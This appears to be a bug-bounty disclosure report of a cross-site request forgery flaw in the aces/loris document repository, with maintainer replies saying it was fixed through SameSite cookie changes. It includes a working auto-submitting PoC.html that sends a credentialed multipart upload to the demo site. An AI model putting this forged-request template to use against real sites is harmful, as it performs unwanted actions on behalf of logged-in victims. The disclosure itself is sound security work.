Cross-Site Request Forgery (CSRF) in aces/loris

Valid

Reported on

Aug 17th 2021

✍️ Description

Attacker able to upload any document with CSRF attack.

It does not matter at all that your application run in localhost or elsewhere, just it is enough to run on a browser and another low privilege user or attackers know the IP address or hostname of your application.

In CSRF attacks it is necessary that a user logged into your application and just going to a malicious website and after that only with a redirection attacker can upload any document , this means only with visiting a site a document will be uploaded .

🕵️‍♂️ Proof of Concept

1.fisrt admin already should be logged in Firefox or Safari.

2.Open the PoC.html (it is auto-submit).

3.Here a Doc with name 1.txt will be uploaded after the PoC.html file opened.

// PoC.html

<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/demo.loris.ca\/document_repository\/Files", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------21093050931404358100794613841");
xhr.withCredentials = true;
var body = "-----------------------------21093050931404358100794613841\r\n" +
"Content-Disposition: form-data; name=\"category\"\r\n" +
"\r\n" +
"3\r\n" +
"-----------------------------21093050931404358100794613841\r\n" +
"Content-Disposition: form-data; name=\"forSite\"\r\n" +
"\r\n" +
"Montreal\r\n" +
"-----------------------------21093050931404358100794613841\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"1.txt\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------21093050931404358100794613841--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

💥 Impact

This vulnerability is capable of upload any Document.

Fix

The easiest way that you set strict attribute on each cookie. The best way is that you set a CSRF token in each endpoint. 📍 Location index.php#L1

Occurrences

index.php L1

amammad modified the report

2 years ago

We have contacted a member of the aces/loris team and are waiting to hear back 2 years ago

A aces/loris maintainer

commented 2 years ago

Maintainer

Thank you for reporting this.

This should be fixed by the same bugfix for the samesite session cookie attribute as your other reports. https://github.com/aces/Loris/pull/7539

A aces/loris maintainer marked this as fixed with commit 13df53 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation